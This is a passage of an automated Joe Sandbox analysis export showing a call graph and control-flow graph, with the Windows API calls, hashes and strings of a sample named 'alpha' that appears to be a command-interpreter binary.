22175->22140 22178 7ff719679158 7 API calls 22176->22178 22177->22141 22177->22146 22177->22147 22177->22148 22177->22153 22177->22171 22179 7ff71966ca16 GetLastError 22177->22179 22178->22140 22181 7ff719663278 166 API calls 22179->22181 22182 7ff71967c675 22181->22182 22182->22140 22184 7ff71966cd90 166 API calls 22183->22184 22185 7ff719675b12 22184->22185 22186 7ff71966cb40 166 API calls 22185->22186 22211 7ff719675b8b 22185->22211 22188 7ff719675b26 22186->22188 22187 7ff719678f80 7 API calls 22189 7ff71966bf99 22187->22189 22190 7ff719670a6c 273 API calls 22188->22190 22188->22211 22189->22123 22191 7ff719675b43 22190->22191 22192 7ff719675bb8 22191->22192 22193 7ff719675b48 GetConsoleTitleW 22191->22193 22194 7ff719675bbd GetConsoleTitleW 22192->22194 22195 7ff719675bf4 22192->22195 22196 7ff71966cad4 172 API calls 22193->22196 22197 7ff71966cad4 172 API calls 22194->22197 22198 7ff71967f452 22195->22198 22202 7ff719675bfd 22195->22202 22199 7ff719675b66 22196->22199 22201 7ff719675bdb 22197->22201 22200 7ff719673c24 166 API calls 22198->22200 22332 7ff719674224 InitializeProcThreadAttributeList 22199->22332 22200->22211 22392 7ff7196696e8 22201->22392 22204 7ff719675c1b 22202->22204 22205 7ff71967f462 22202->22205 22202->22211 22208 7ff719663278 166 API calls 22204->22208 22209 7ff719663278 166 API calls 22205->22209 22206 7ff719675b7f 22210 7ff719675c3c SetConsoleTitleW 22206->22210 22208->22211 22209->22211 22210->22211 22211->22187 22213 7ff71966c0c4 22212->22213 22214 7ff71966c01c 22212->22214 22213->22108 22215 7ff71966c086 22214->22215 22216 7ff71966c022 22214->22216 22220 7ff71966c144 22215->22220 22231 7ff71966c094 22215->22231 22217 7ff71966c113 22216->22217 22218 7ff71966c030 22216->22218 22229 7ff71966ff70 2 API calls 22217->22229 22233 7ff71966c053 22217->22233 22219 7ff71966c039 wcschr 22218->22219 22218->22233 22222 7ff71966c301 22219->22222 22219->22233 22221 7ff71966c151 22220->22221 22239 7ff71966c1c8 22220->22239 22598 7ff71966c460 22221->22598 22228 7ff71966cd90 166 API calls 22222->22228 22223 7ff71966c058 22234 7ff71966ff70 2 API calls 22223->22234 22237 7ff71966c073 22223->22237 22224 7ff71966c0c6 22227 7ff71966c0cf wcschr 22224->22227 22224->22237 22226 7ff71966c460 183 API calls 22226->22231 22232 7ff71966c1be 22227->22232 22227->22237 22249 7ff71966c30b 22228->22249 22229->22233 22231->22213 22231->22226 22235 7ff71966cd90 166 API calls 22232->22235 22233->22223 22233->22224 22241 7ff71966c211 22233->22241 22234->22237 22235->22239 22236 7ff71966c460 183 API calls 22236->22213 22237->22213 22238 7ff71966c460 183 API calls 22237->22238 22238->22237 22239->22213 22240 7ff71966c285 22239->22240 22239->22241 22246 7ff71966d840 178 API calls 22239->22246 22240->22241 22245 7ff71966b6b0 170 API calls 22240->22245 22244 7ff71966ff70 2 API calls 22241->22244 22242 7ff71966b6b0 170 API calls 22242->22233 22243 7ff71966d840 178 API calls 22243->22249 22244->22213 22247 7ff71966c2ac 22245->22247 22246->22239 22247->22237 22247->22241 22248 7ff71966c3d4 22248->22237 22248->22241 22248->22242 22249->22213 22249->22241 22249->22243 22249->22248 22251 7ff71966ca40 17 API calls 22250->22251 22266 7ff71966b162 22251->22266 22252 7ff71966b1d9 22257 7ff71966cd90 166 API calls 22252->22257 22274 7ff71966b1ed 22252->22274 22253 7ff71966b2f7 ??_V@YAXPEAX 22254 7ff71966b303 22253->22254 22256 7ff719678f80 7 API calls 22254->22256 22255 7ff719671ea0 8 API calls 22255->22266 22258 7ff71966b315 22256->22258 22257->22274 22258->22112 22258->22125 22260 7ff71966b228 _get_osfhandle 22262 7ff71966b23f _get_osfhandle 22260->22262 22260->22274 22261 7ff71967bfef _get_osfhandle SetFilePointer 22263 7ff71967c01d 22261->22263 22261->22274 22262->22274 22265 7ff7196733f0 _vsnwprintf 22263->22265 22268 7ff71967c038 22265->22268 22266->22252 22266->22255 22266->22266 22300 7ff71966b2e1 22266->22300 22267 7ff7196701b8 6 API calls 22267->22274 22273 7ff719663278 166 API calls 22268->22273 22269 7ff71967c1c3 22270 7ff7196733f0 _vsnwprintf 22269->22270 22270->22268 22271 7ff71966d208 _close 22271->22274 22272 7ff7196726e0 19 API calls 22272->22274 22276 7ff71967c1f9 22273->22276 22274->22260 22274->22261 22274->22267 22274->22269 22274->22271 22274->22272 22275 7ff71967c060 22274->22275 22277 7ff71967c246 22274->22277 22279 7ff71966b038 _dup2 22274->22279 22284 7ff71966b356 22274->22284 22274->22300 22309 7ff71967c1a5 22274->22309 22612 7ff71966affc _dup 22274->22612 22614 7ff71968f318 _get_osfhandle GetFileType 22274->22614 22275->22277 22281 7ff7196709f4 2 API calls 22275->22281 22278 7ff71966af98 2 API calls 22276->22278 22282 7ff71966af98 2 API calls 22277->22282 22278->22300 22279->22274 22280 7ff71966b038 _dup2 22283 7ff71967c1b7 22280->22283 22285 7ff71967c084 22281->22285 22286 7ff71967c24b 22282->22286 22287 7ff71967c1be 22283->22287 22288 7ff71967c207 22283->22288 22291 7ff71966af98 2 API calls 22284->22291 22289 7ff71966b900 166 API calls 22285->22289 22290 7ff71968f1d8 166 API calls 22286->22290 22292 7ff71966d208 _close 22287->22292 22294 7ff71966d208 _close 22288->22294 22293 7ff71967c08c 22289->22293 22290->22300 22295 7ff71967c211 22291->22295 22292->22269 22296 7ff71967c094 wcsrchr 22293->22296 22304 7ff71967c0ad 22293->22304 22294->22284 22297 7ff7196733f0 _vsnwprintf 22295->22297 22296->22304 22298 7ff71967c22c 22297->22298 22299 7ff719663278 166 API calls 22298->22299 22299->22300 22300->22253 22300->22254 22301 7ff71967c106 22302 7ff71966ff70 2 API calls 22301->22302 22305 7ff71967c13b 22302->22305 22303 7ff71967c0e0 _wcsnicmp 22303->22304 22304->22301 22304->22303 22305->22277 22306 7ff71967c146 SearchPathW 22305->22306 22306->22277 22307 7ff71967c188 22306->22307 22308 7ff7196726e0 19 API calls 22307->22308 22308->22309 22309->22280 22311 7ff719667279 22310->22311 22312 7ff719667211 _setjmp 22310->22312 22311->22127 22312->22311 22314 7ff719667265 22312->22314 22615 7ff7196672b0 22314->22615 22317 7ff71966cb63 22316->22317 22318 7ff71966cd90 166 API calls 22317->22318 22319 7ff71966c848 22318->22319 22319->22169 22320 7ff71966cad4 22319->22320 22321 7ff71966cad9 22320->22321 22322 7ff71966cb05 22320->22322 22321->22322 22323 7ff71966cd90 166 API calls 22321->22323 22322->22169 22324 7ff71967c722 22323->22324 22324->22322 22325 7ff71967c72e GetConsoleTitleW 22324->22325 22325->22322 22326 7ff71967c74a 22325->22326 22327 7ff71966b6b0 170 API calls 22326->22327 22331 7ff71967c778 22327->22331 22328 7ff71967c7ec 22329 7ff71966ff70 2 API calls 22328->22329 22329->22322 22330 7ff71967c7dd SetConsoleTitleW 22330->22328 22331->22328 22331->22330 22333 7ff7196742ab UpdateProcThreadAttribute 22332->22333 22334 7ff71967ecd4 GetLastError 22332->22334 22336 7ff7196742eb memset memset GetStartupInfoW 22333->22336 22337 7ff71967ecf0 GetLastError 22333->22337 22335 7ff71967ecee 22334->22335 22339 7ff719673a90 170 API calls 22336->22339 22429 7ff719689eec 22337->22429 22341 7ff7196743a8 22339->22341 22342 7ff71966b900 166 API calls 22341->22342 22343 7ff7196743bb 22342->22343 22344 7ff7196743cc 22343->22344 22345 7ff719674638 _local_unwind 22343->22345 22346 7ff7196743de wcsrchr 22344->22346 22347 7ff719674415 22344->22347 22345->22344 22346->22347 22348 7ff7196743f7 lstrcmpW 22346->22348 22416 7ff719675a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22347->22416 22348->22347 22350 7ff719674668 22348->22350 22417 7ff719689044 22350->22417 22351 7ff71967441a 22353 7ff71967442a CreateProcessW 22351->22353 22355 7ff719674596 CreateProcessAsUserW 22351->22355 22354 7ff71967448b 22353->22354 22356 7ff719674495 CloseHandle 22354->22356 22357 7ff719674672 GetLastError 22354->22357 22355->22354 22358 7ff71967498c 8 API calls 22356->22358 22361 7ff71967468d 22357->22361 22359 7ff7196744c5 22358->22359 22359->22361 22363 7ff7196744cd 22359->22363 22360 7ff7196747a3 22360->22206 22362 7ff71966cd90 166 API calls 22361->22362 22361->22363 22366 7ff719674724 22362->22366 22363->22360 22379 7ff71968a250 33 API calls 22363->22379 22382 7ff7196744f8 22363->22382 22364 7ff719675cb4 7 API calls 22367 7ff719674517 22364->22367 22365 7ff71967461c 22370 7ff71966ff70 GetProcessHeap RtlFreeHeap 22365->22370 22368 7ff71967472c _local_unwind 22366->22368 22376 7ff71967473d 22366->22376 22371 7ff7196733f0 _vsnwprintf 22367->22371 22368->22376 22369 7ff7196747e1 CloseHandle 22369->22365 22372 7ff7196747fa DeleteProcThreadAttributeList 22370->22372 22373 7ff719674544 22371->22373 22374 7ff719678f80 7 API calls 22372->22374 22375 7ff71967498c 8 API calls 22373->22375 22377 7ff719674820 22374->22377 22378 7ff719674558 22375->22378 22383 7ff71966ff70 GetProcessHeap RtlFreeHeap 22376->22383 22377->22206 22380 7ff7196747ae 22378->22380 22381 7ff719674564 22378->22381 22379->22382 22386 7ff7196733f0 _vsnwprintf 22380->22386 22385 7ff71967498c 8 API calls 22381->22385 22382->22360 22382->22364 22388 7ff719674612 22382->22388 22384 7ff71967475b _local_unwind 22383->22384 22384->22363 22387 7ff719674577 22385->22387 22386->22388 22387->22365 22389 7ff71967457f 22387->22389 22388->22365 22388->22369 22390 7ff71968a920 210 API calls 22389->22390 22391 7ff719674584 22390->22391 22391->22365 22394 7ff719669737 22392->22394 22395 7ff71966977d memset 22394->22395 22396 7ff71966cd90 166 API calls 22394->22396 22398 7ff71967b76e 22394->22398 22399 7ff71967b7b3 22394->22399 22401 7ff71966b364 17 API calls 22394->22401 22408 7ff71967b79a 22394->22408 22410 7ff7196696b4 186 API calls 22394->22410 22411 7ff71966986d 22394->22411 22431 7ff719671fac memset 22394->22431 22458 7ff71966ce10 22394->22458 22508 7ff719675920 22394->22508 22397 7ff71966ca40 17 API calls 22395->22397 22396->22394 22397->22394 22400 7ff719663278 166 API calls 22398->22400 22403 7ff71967b787 22400->22403 22401->22394 22402 7ff71967855c ??_V@YAXPEAX 22402->22399 22404 7ff71967b795 22403->22404 22406 7ff71968e944 393 API calls 22403->22406 22514 7ff719687694 22404->22514 22406->22404 22408->22402 22410->22394 22412 7ff71966988c 22411->22412 22413 7ff719669880 ??_V@YAXPEAX 22411->22413 22414 7ff719678f80 7 API calls 22412->22414 22413->22412 22415 7ff71966989d 22414->22415 22415->22206 22418 7ff719673a90 170 API calls 22417->22418 22419 7ff719689064 22418->22419 22420 7ff719689083 22419->22420 22421 7ff71968906e 22419->22421 22424 7ff71966cd90 166 API calls 22420->22424 22422 7ff71967498c 8 API calls 22421->22422 22423 7ff719689081 22422->22423 22423->22347 22425 7ff71968909b 22424->22425 22425->22423 22426 7ff71967498c 8 API calls 22425->22426 22427 7ff7196890ec 22426->22427 22428 7ff71966ff70 2 API calls 22427->22428 22428->22423 22430 7ff71967ed0a DeleteProcThreadAttributeList 22429->22430 22430->22335 22432 7ff71967203b 22431->22432 22433 7ff7196720b0 22432->22433 22434 7ff719672094 22432->22434 22435 7ff719673060 171 API calls 22433->22435 22436 7ff71967211c 22433->22436 22437 7ff719663278 166 API calls 22434->22437 22438 7ff7196720a6 22434->22438 22435->22436 22436->22438 22439 7ff719672e44 2 API calls 22436->22439 22437->22438 22440 7ff719678f80 7 API calls 22438->22440 22442 7ff719672148 22439->22442 22441 7ff719672325 22440->22441 22441->22394 22442->22438 22443 7ff719672d70 3 API calls 22442->22443 22444 7ff7196721af 22443->22444 22445 7ff71966b900 166 API calls 22444->22445 22447 7ff7196721d0 22445->22447 22446 7ff71967e04a ??_V@YAXPEAX 22446->22438 22447->22446 22448 7ff71967221c wcsspn 22447->22448 22457 7ff7196722a4 ??_V@YAXPEAX 22447->22457 22450 7ff71966b900 166 API calls 22448->22450 22451 7ff71967223b 22450->22451 22451->22446 22455 7ff719672252 22451->22455 22452 7ff71967228f 22453 7ff71966d3f0 223 API calls 22452->22453 22453->22457 22454 7ff71967e06d wcschr 22454->22455 22455->22452 22455->22454 22456 7ff71967e090 towupper 22455->22456 22456->22452 22456->22455 22457->22438 22496 7ff71966d0f8 22458->22496 22503 7ff71966ce5b 22458->22503 22459 7ff719678f80 7 API calls 22462 7ff71966d10a 22459->22462 22460 7ff71967c860 22461 7ff71967c97c 22460->22461 22465 7ff71968ee88 390 API calls 22460->22465 22464 7ff71968e9b4 197 API calls 22461->22464 22462->22394 22463 7ff719670494 182 API calls 22463->22503 22466 7ff71967c981 longjmp 22464->22466 22467 7ff71967c879 22465->22467 22468 7ff71967c99a 22466->22468 22469 7ff71967c95c 22467->22469 22470 7ff71967c882 EnterCriticalSection LeaveCriticalSection 22467->22470 22472 7ff71967c9b3 ??_V@YAXPEAX 22468->22472 22468->22496 22469->22461 22473 7ff7196696b4 186 API calls 22469->22473 22475 7ff71966d0e3 22470->22475 22472->22496 22473->22469 22474 7ff71966ceaa _tell 22476 7ff71966d208 _close 22474->22476 22475->22394 22476->22503 22477 7ff71966cd90 166 API calls 22477->22503 22478 7ff71967c9d5 22479 7ff71968d610 167 API calls 22478->22479 22481 7ff71967c9da 22479->22481 22480 7ff71966b900 166 API calls 22480->22503 22482 7ff71967ca07 22481->22482 22484 7ff71968bfec 176 API calls 22481->22484 22483 7ff71968e91c 198 API calls 22482->22483 22488 7ff71967ca0c 22483->22488 22485 7ff71967c9f1 22484->22485 22487 7ff719663240 166 API calls 22485->22487 22486 7ff71966cf33 memset 22486->22503 22487->22482 22488->22394 22489 7ff71966ca40 17 API calls 22489->22503 22490 7ff71966d184 wcschr 22490->22503 22491 7ff71968bfec 176 API calls 22491->22503 22492 7ff71967c9c9 22494 7ff71967855c ??_V@YAXPEAX 22492->22494 22493 7ff71966d1a7 wcschr 22493->22503 22494->22496 22495 7ff71968778c 166 API calls 22495->22503 22496->22459 22497 7ff719670a6c 273 API calls 22497->22503 22498 7ff71966be00 635 API calls 22498->22503 22499 7ff719673448 166 API calls 22499->22503 22500 7ff719670580 12 API calls 22502 7ff71966d003 GetConsoleOutputCP GetCPInfo 22500->22502 22501 7ff71966cfab _wcsicmp 22501->22503 22504 7ff7196704f4 3 API calls 22502->22504 22503->22460 22503->22463 22503->22468 22503->22475 22503->22477 22503->22478 22503->22480 22503->22486 22503->22489 22503->22490 22503->22491 22503->22492 22503->22493 22503->22495 22503->22496 22503->22497 22503->22498 22503->22499 22503->22500 22503->22501 22506 7ff719671fac 238 API calls 22503->22506 22507 7ff71966d044 ??_V@YAXPEAX 22503->22507 22520 7ff71966df60 22503->22520 22540 7ff71968c738 22503->22540 22504->22503 22506->22503 22507->22503 22509 7ff71967596c 22508->22509 22510 7ff719675a12 22508->22510 22509->22510 22511 7ff71967598d VirtualQuery 22509->22511 22510->22394 22511->22510 22513 7ff7196759ad 22511->22513 22512 7ff7196759b7 VirtualQuery 22512->22510 22512->22513 22513->22510 22513->22512 22515 7ff7196876a3 22514->22515 22516 7ff7196876b7 22515->22516 22517 7ff7196696b4 186 API calls 22515->22517 22518 7ff71968e9b4 197 API calls 22516->22518 22517->22515 22519 7ff7196876bc longjmp 22518->22519 22521 7ff71966df93 22520->22521 22522 7ff71966dfe2 22520->22522 22521->22522 22523 7ff71966df9f GetProcessHeap RtlFreeHeap 22521->22523 22524 7ff71966e100 VirtualFree 22522->22524 22525 7ff71966e00b _setjmp 22522->22525 22523->22521 22523->22522 22524->22522 22526 7ff71966e04a 22525->22526 22534 7ff71966e0c3 22525->22534 22527 7ff71966e600 473 API calls 22526->22527 22528 7ff71966e073 22527->22528 22529 7ff71966e081 22528->22529 22530 7ff71966e0e0 longjmp 22528->22530 22532 7ff71966d250 475 API calls 22529->22532 22531 7ff71966e0b0 22530->22531 22531->22534 22550 7ff71968d3fc 22531->22550 22533 7ff71966e086 22532->22533 22533->22531 22537 7ff71966e600 473 API calls 22533->22537 22534->22474 22538 7ff71966e0a7 22537->22538 22538->22531 22539 7ff71968d610 167 API calls 22538->22539 22539->22531 22541 7ff71968c775 22540->22541 22542 7ff71968c7ab 22540->22542 22543 7ff71966cd90 166 API calls 22541->22543 22544 7ff71968c781 22542->22544 22545 7ff71968c8d4 22542->22545 22547 7ff71966b6b0 170 API calls 22542->22547 22548 7ff71966b038 _dup2 22542->22548 22549 7ff71966d208 _close 22542->22549 22543->22544 22544->22545 22546 7ff71966b0d8 194 API calls 22544->22546 22545->22503 22546->22545 22547->22542 22548->22542 22549->22542 22561 7ff71968d419 22550->22561 22551 7ff71967cadf 22552 7ff719673448 166 API calls 22552->22561 22553 7ff71968d592 22555 7ff719673448 166 API calls 22553->22555 22554 7ff71968d5c4 22556 7ff719673448 166 API calls 22554->22556 22558 7ff71968d5a5 22555->22558 22556->22551 22560 7ff71968d5ba 22558->22560 22564 7ff719673448 166 API calls 22558->22564 22559 7ff71968d546 22559->22554 22562 7ff71968d555 22559->22562 22568 7ff71968d36c 22560->22568 22561->22551 22561->22552 22561->22553 22561->22554 22561->22562 22563 7ff71968d541 22561->22563 22566 7ff71968d3fc 166 API calls 22561->22566 22575 7ff71968d31c 22562->22575 22563->22553 22563->22554 22563->22559 22567 7ff71968d589 22563->22567 22564->22560 22566->22561 22567->22553 22567->22562 22569 7ff71968d381 22568->22569 22570 7ff71968d3d8 22568->22570 22571 7ff7196734a0 166 API calls 22569->22571 22574 7ff71968d390 22571->22574 22572 7ff719673448 166 API calls 22572->22574 22573 7ff7196734a0 166 API calls 22573->22574 22574->22570 22574->22572 22574->22573 22574->22574 22576 7ff719673448 166 API calls 22575->22576 22577 7ff71968d33b 22576->22577 22578 7ff71968d36c 166 API calls 22577->22578 22579 7ff71968d343 22578->22579 22580 7ff71968d3fc 166 API calls 22579->22580 22586 7ff71968d34e 22580->22586 22581 7ff719673448 166 API calls 22581->22586 22582 7ff71968d592 22584 7ff719673448 166 API calls 22582->22584 22583 7ff71968d5c4 22585 7ff719673448 166 API calls 22583->22585 22588 7ff71968d5a5 22584->22588 22596 7ff71968d5c2 22585->22596 22586->22581 22586->22582 22586->22583 22589 7ff71968d541 22586->22589 22594 7ff71968d555 22586->22594 22586->22596 22597 7ff71968d3fc 166 API calls 22586->22597 22587 7ff71968d31c 166 API calls 22587->22596 22590 7ff71968d5ba 22588->22590 22592 7ff719673448 166 API calls 22588->22592 22589->22582 22589->22583 22591 7ff71968d546 22589->22591 22595 7ff71968d589 22589->22595 22593 7ff71968d36c 166 API calls 22590->22593 22591->22583 22591->22594 22592->22590 22593->22596 22594->22587 22595->22582 22595->22594 22596->22551 22597->22586 22599 7ff71966c4c9 22598->22599 22600 7ff71966c486 22598->22600 22603 7ff71966ff70 2 API calls 22599->22603 22605 7ff71966c161 22599->22605 22601 7ff71966c48e wcschr 22600->22601 22600->22605 22602 7ff71966c4ef 22601->22602 22601->22605 22604 7ff71966cd90 166 API calls 22602->22604 22603->22605 22611 7ff71966c4f9 22604->22611 22605->22213 22605->22236 22606 7ff71966c5bd 22607 7ff71966c541 22606->22607 22610 7ff71966b6b0 170 API calls 22606->22610 22607->22605 22609 7ff71966ff70 2 API calls 22607->22609 22608 7ff71966d840 178 API calls 22608->22611 22609->22605 22610->22607 22611->22605 22611->22606 22611->22607 22611->22608 22613 7ff71966b018 22612->22613 22613->22274 22614->22274 22616 7ff7196672de 22615->22616 22617 7ff719684621 22615->22617 22618 7ff7196672eb 22616->22618 22626 7ff719684467 22616->22626 22627 7ff719684530 22616->22627 22619 7ff7196847e0 22617->22619 22622 7ff71968447b longjmp 22617->22622 22623 7ff719684639 22617->22623 22646 7ff71968475e 22617->22646 22676 7ff719667348 22618->22676 22621 7ff719667348 168 API calls 22619->22621 22674 7ff719684524 22621->22674 22624 7ff719684492 22622->22624 22628 7ff719684695 22623->22628 22644 7ff71968463e 22623->22644 22629 7ff719667348 168 API calls 22624->22629 22626->22618 22626->22624 22637 7ff719684475 22626->22637 22630 7ff719667348 168 API calls 22627->22630 22636 7ff7196673d4 168 API calls 22628->22636 22638 7ff7196844a8 22629->22638 22653 7ff719684549 22630->22653 22631 7ff719667315 22691 7ff7196673d4 22631->22691 22632 7ff719667348 168 API calls 22632->22619 22633 7ff719667348 168 API calls 22633->22631 22634 7ff7196672b0 168 API calls 22640 7ff71968480e 22634->22640 22654 7ff71968469a 22636->22654 22637->22622 22637->22628 22649 7ff7196844e2 22638->22649 22657 7ff719667348 168 API calls 22638->22657 22639 7ff7196845b2 22642 7ff719667348 168 API calls 22639->22642 22640->22311 22641 7ff719667323 22641->22311 22648 7ff7196845c7 22642->22648 22643 7ff719684654 22650 7ff719667348 168 API calls 22643->22650 22644->22622 22644->22643 22645 7ff71968455e 22645->22639 22655 7ff719667348 168 API calls 22645->22655 22646->22632 22647 7ff7196846e1 22651 7ff7196672b0 168 API calls 22647->22651 22656 7ff719667348 168 API calls 22648->22656 22658 7ff7196672b0 168 API calls 22649->22658 22650->22641 22652 7ff719684738 22651->22652 22659 7ff719667348 168 API calls 22652->22659 22653->22639 22653->22645 22662 7ff719667348 168 API calls 22653->22662 22654->22647 22665 7ff7196846ea 22654->22665 22666 7ff7196846c7 22654->22666 22655->22639 22660 7ff7196845db 22656->22660 22657->22649 22661 7ff7196844f1 22658->22661 22659->22674 22663 7ff719667348 168 API calls 22660->22663 22664 7ff7196672b0 168 API calls 22661->22664 22662->22645 22667 7ff7196845ec 22663->22667 22668 7ff719684503 22664->22668 22669 7ff719667348 168 API calls 22665->22669 22666->22647 22672 7ff719667348 168 API calls 22666->22672 22670 7ff719667348 168 API calls 22667->22670 22668->22641 22671 7ff719667348 168 API calls 22668->22671 22669->22647 22673 7ff719684600 22670->22673 22671->22674 22672->22647 22675 7ff719667348 168 API calls 22673->22675 22674->22634 22674->22641 22675->22674 22683 7ff71966735d 22676->22683 22677 7ff719663278 166 API calls 22678 7ff719684820 longjmp 22677->22678 22679 7ff719684838 22678->22679 22680 7ff719663278 166 API calls 22679->22680 22681 7ff719684844 longjmp 22680->22681 22682 7ff71968485a 22681->22682 22684 7ff719667348 166 API calls 22682->22684 22683->22677 22683->22679 22683->22683 22690 7ff7196673ab 22683->22690 22685 7ff71968487b 22684->22685 22686 7ff719667348 166 API calls 22685->22686 22687 7ff7196848ad 22686->22687 22688 7ff719667348 166 API calls 22687->22688 22689 7ff7196672ff 22688->22689 22689->22631 22689->22633 22692 7ff719667401 22691->22692 22692->22641 22693 7ff719667348 168 API calls 22692->22693 22694 7ff71968487b 22693->22694 22695 7ff719667348 168 API calls 22694->22695 22696 7ff7196848ad 22695->22696 22697 7ff719667348 168 API calls 22696->22697 22698 7ff7196848be 22697->22698 22698->22641
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                    • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                    • API String ID: 3305344409-4288247545
                                                                    • Opcode ID: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                                    • Instruction ID: bed9b7f3833799fcd5bb45729dd33067bf2f5524599defca2c870c32568121fb
                                                                    • Opcode Fuzzy Hash: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                                    • Instruction Fuzzy Hash: 4E429425A08E82C5EA58AF1198102B9A7B3BF85BBCF854535D91E4B7D4DF3CE54E8330

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 216 7ff71966aa54-7ff71966aa98 call 7ff71966cd90 219 7ff71966aa9e 216->219 220 7ff71967bf5a-7ff71967bf70 call 7ff719674c1c call 7ff71966ff70 216->220 221 7ff71966aaa5-7ff71966aaa8 219->221 223 7ff71966acde-7ff71966ad00 221->223 224 7ff71966aaae-7ff71966aac8 wcschr 221->224 229 7ff71966ad06 223->229 224->223 226 7ff71966aace-7ff71966aae9 towlower 224->226 226->223 228 7ff71966aaef-7ff71966aaf3 226->228 231 7ff71966aaf9-7ff71966aafd 228->231 232 7ff71967beb7-7ff71967bec4 call 7ff71968eaf0 228->232 233 7ff71966ad0d-7ff71966ad1f 229->233 235 7ff71966ab03-7ff71966ab07 231->235 236 7ff71967bbcf 231->236 248 7ff71967bec6-7ff71967bed8 call 7ff719663240 232->248 249 7ff71967bf43-7ff71967bf59 call 7ff719674c1c 232->249 237 7ff71966ad22-7ff71966ad2a call 7ff7196713e0 233->237 239 7ff71966ab7d-7ff71966ab81 235->239 240 7ff71966ab09-7ff71966ab0d 235->240 243 7ff71967bbde 236->243 237->221 244 7ff71966ab87-7ff71966ab95 239->244 245 7ff71967be63 239->245 240->245 246 7ff71966ab13-7ff71966ab17 240->246 255 7ff71967bbea-7ff71967bbec 243->255 251 7ff71966ab98-7ff71966aba0 244->251 258 7ff71967be72-7ff71967be88 call 7ff719663278 call 7ff719674c1c 245->258 246->239 252 7ff71966ab19-7ff71966ab1d 246->252 248->249 263 7ff71967beda-7ff71967bee9 call 7ff719663240 248->263 249->220 251->251 256 7ff71966aba2-7ff71966abb3 call 7ff71966cd90 251->256 252->243 257 7ff71966ab23-7ff71966ab27 252->257 265 7ff71967bbf8-7ff71967bc01 255->265 256->220 270 7ff71966abb9-7ff71966abde call 7ff7196713e0 call 7ff7196733a8 256->270 257->255 261 7ff71966ab2d-7ff71966ab31 257->261 279 7ff71967be89-7ff71967be8c 258->279 261->229 267 7ff71966ab37-7ff71966ab3b 261->267 273 7ff71967beeb-7ff71967bef1 263->273 274 7ff71967bef3-7ff71967bef9 263->274 265->233 267->265 271 7ff71966ab41-7ff71966ab45 267->271 308 7ff71966ac75 270->308 309 7ff71966abe4-7ff71966abe7 270->309 276 7ff71966ab4b-7ff71966ab4f 271->276 277 7ff71967bc06-7ff71967bc2a call 7ff7196713e0 271->277 273->249 273->274 274->249 280 7ff71967befb-7ff71967bf0d call 7ff719663240 274->280 283 7ff71966ab55-7ff71966ab78 call 7ff7196713e0 276->283 284 7ff71966ad2f-7ff71966ad33 276->284 297 7ff71967bc2c-7ff71967bc4c _wcsnicmp 277->297 298 7ff71967bc5a-7ff71967bc61 277->298 285 7ff71966acbe 279->285 286 7ff71967be92-7ff71967beaa call 7ff719663278 call 7ff719674c1c 279->286 280->249 306 7ff71967bf0f-7ff71967bf21 call 7ff719663240 280->306 283->221 290 7ff71966ad39-7ff71966ad3d 284->290 291 7ff71967bc66-7ff71967bc8a call 7ff7196713e0 284->291 293 7ff71966acc0-7ff71966acc7 285->293 337 7ff71967beab-7ff71967beb6 call 7ff719674c1c 286->337 300 7ff71967bcde-7ff71967bd02 call 7ff7196713e0 290->300 301 7ff71966ad43-7ff71966ad49 290->301 314 7ff71967bc8c-7ff71967bcaa _wcsnicmp 291->314 315 7ff71967bcc4-7ff71967bcdc 291->315 293->293 303 7ff71966acc9-7ff71966acda 293->303 297->298 307 7ff71967bc4e-7ff71967bc55 297->307 312 7ff71967bd31-7ff71967bd4f _wcsnicmp 298->312 329 7ff71967bd2a 300->329 330 7ff71967bd04-7ff71967bd24 _wcsnicmp 300->330 310 7ff71967bd5e-7ff71967bd65 301->310 311 7ff71966ad4f-7ff71966ad68 301->311 303->223 306->249 339 7ff71967bf23-7ff71967bf35 call 7ff719663240 306->339 322 7ff71967bbb3-7ff71967bbb7 307->322 319 7ff71966ac77-7ff71966ac7f 308->319 309->285 324 7ff71966abed-7ff71966ac0b call 7ff71966cd90 * 2 309->324 310->311 323 7ff71967bd6b-7ff71967bd73 310->323 325 7ff71966ad6d-7ff71966ad70 311->325 326 7ff71966ad6a 311->326 320 7ff71967bd55 312->320 321 7ff71967bbc2-7ff71967bbca 312->321 314->315 327 7ff71967bcac-7ff71967bcbf 314->327 315->312 319->285 336 7ff71966ac81-7ff71966ac85 319->336 320->310 321->221 331 7ff71967bbba-7ff71967bbbd call 7ff7196713e0 322->331 332 7ff71967be4a-7ff71967be5e 323->332 333 7ff71967bd79-7ff71967bd8b iswxdigit 323->333 324->337 356 7ff71966ac11-7ff71966ac14 324->356 325->237 326->325 327->322 329->312 330->329 338 7ff71967bbac 330->338 331->321 332->331 333->332 342 7ff71967bd91-7ff71967bda3 iswxdigit 333->342 340 7ff71966ac88-7ff71966ac8f 336->340 337->232 338->322 339->249 357 7ff71967bf37-7ff71967bf3e call 7ff719663240 339->357 340->340 348 7ff71966ac91-7ff71966ac94 340->348 342->332 345 7ff71967bda9-7ff71967bdbb iswxdigit 342->345 345->332 349 7ff71967bdc1-7ff71967bdd7 